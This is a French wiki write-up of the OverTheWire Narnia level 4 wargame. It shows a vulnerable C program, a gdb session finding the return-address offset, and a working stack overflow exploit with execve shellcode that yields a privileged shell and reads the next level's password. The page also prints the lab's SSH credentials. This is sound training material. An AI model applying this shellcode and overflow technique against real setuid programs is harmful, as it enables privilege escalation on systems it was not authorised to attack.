Outils d'utilisateurs
overthewire_narnia:level4
Level 4
ssh narnia4@narnia.labs.overthewire.org pass : thaenohtai
#include <string.h> #include <stdlib.h> #include <stdio.h> #include <ctype.h> extern char **environ; int main(int argc,char **argv){ int i; char buffer[256]; for(i = 0; environ[i] != NULL; i++) memset(environ[i], '\0', strlen(environ[i])); if(argc>1) strcpy(buffer,argv[1]); return 0; }
Buffer stack overflow classique, si vous avez l'habitude d'utiliser les variables d'environnement pour mettre votre shellcode cela ne va pas être possible ici : il est entièrement mis à NULL ! On va donc mettre directement notre shellcode dans buffer et sauter dessus :)
gdb$ r $(python -c 'print "\xcc"*272+"BBBB"') Program received signal SIGSEGV, Segmentation fault. --------------------------------------------------------------------------[regs] EAX: 00000000 EBX: F7FD2FF4 ECX: 00000000 EDX: FFFFD919 o d I t s Z a P c ESI: 00000000 EDI: 00000000 EBP: CCCCCCCC ESP: FFFFD620 EIP: 42424242 CS: 0023 DS: 002B ES: 002B FS: 0000 GS: 0063 SS: 002BError while running hook_stop: Cannot access memory at address 0x42424242 0x42424242 in ?? () gdb$ x/200x $esp 0xffffd620: 0x00000000 0xffffd6c4 0xffffd6d0 0xf7fdf420 0xffffd630: 0xffffffff 0xf7ffcff4 0x0804827a 0x00000001 0xffffd640: 0xffffd680 0xf7fedd61 0xf7ffdad0 0xf7fd72e8 0xffffd650: 0x00000001 0xf7fd2ff4 0x00000000 0x00000000 0xffffd660: 0xffffd698 0x5326f6a1 0x7db14eb1 0x00000000 0xffffd670: 0x00000000 0x00000000 0x00000002 0x080483a0 0xffffd680: 0x00000000 0xf7ff3f70 0xf7e89d5b 0xf7ffcff4 0xffffd690: 0x00000002 0x080483a0 0x00000000 0x080483c1 0xffffd6a0: 0x08048454 0x00000002 0xffffd6c4 0x08048500 0xffffd6b0: 0x08048560 0xf7feed80 0xffffd6bc 0xf7ffd918 0xffffd6c0: 0x00000002 0xffffd7f4 0xffffd804 0x00000000 0xffffd6d0: 0xffffd919 0xffffd929 0xffffd93d 0xffffd95e 0xffffd6e0: 0xffffd971 0xffffd984 0xffffd991 0xffffde81 0xffffd6f0: 0xffffde8c 0xffffde98 0xffffdee5 0xffffdefc 0xffffd700: 0xffffdf0b 0xffffdf17 0xffffdf28 0xffffdf31 0xffffd710: 0xffffdf44 0xffffdf4c 0xffffdf5c 0xffffdf71 0xffffd720: 0xffffdfa6 0xffffdfc6 0x00000000 0x00000020 0xffffd730: 0xf7fdf420 0x00000021 0xf7fdf000 0x00000010 0xffffd740: 0x17898175 0x00000006 0x00001000 0x00000011 0xffffd750: 0x00000064 0x00000003 0x08048034 0x00000004 0xffffd760: 0x00000020 0x00000005 0x00000007 0x00000007 0xffffd770: 0xf7fe0000 0x00000008 0x00000000 0x00000009 0xffffd780: 0x080483a0 0x0000000b 0x000036b4 0x0000000c 0xffffd790: 0x000036b4 0x0000000d 0x000036b4 0x0000000e 0xffffd7a0: 0x000036b4 0x00000017 0x00000000 0x00000019 0xffffd7b0: 0xffffd7db 0x0000001f 0xffffdfe8 0x0000000f 0xffffd7c0: 0xffffd7eb 0x00000000 0x00000000 0x00000000 0xffffd7d0: 0x00000000 0x00000000 0x08000000 0x5b4ce26c 0xffffd7e0: 0x85af5645 0x503435d7 0x69632138 0x00363836 0xffffd7f0: 0x00000000 0x706d742f 0x2f346e2f 0x6e72616e 0xffffd800: 0x00346169 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd810: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd820: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd830: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd840: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd850: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd860: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd870: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd880: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd890: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd8a0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd8b0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd8c0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd8d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd8e0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd8f0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd900: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0xffffd910: 0xcccccccc 0x42424242 0x00000000 0x00000000
Nous pouvons donc par exemple sauter à l'adresse 0xffffd830.
narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"') bash-4.2$ id uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4) bash-4.2$ cat /etc/narnia_pass/narnia5 faimahchiy
overthewire_narnia/level4.txt · Dernière modification: 2017/04/09 15:33 (modification externe)
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
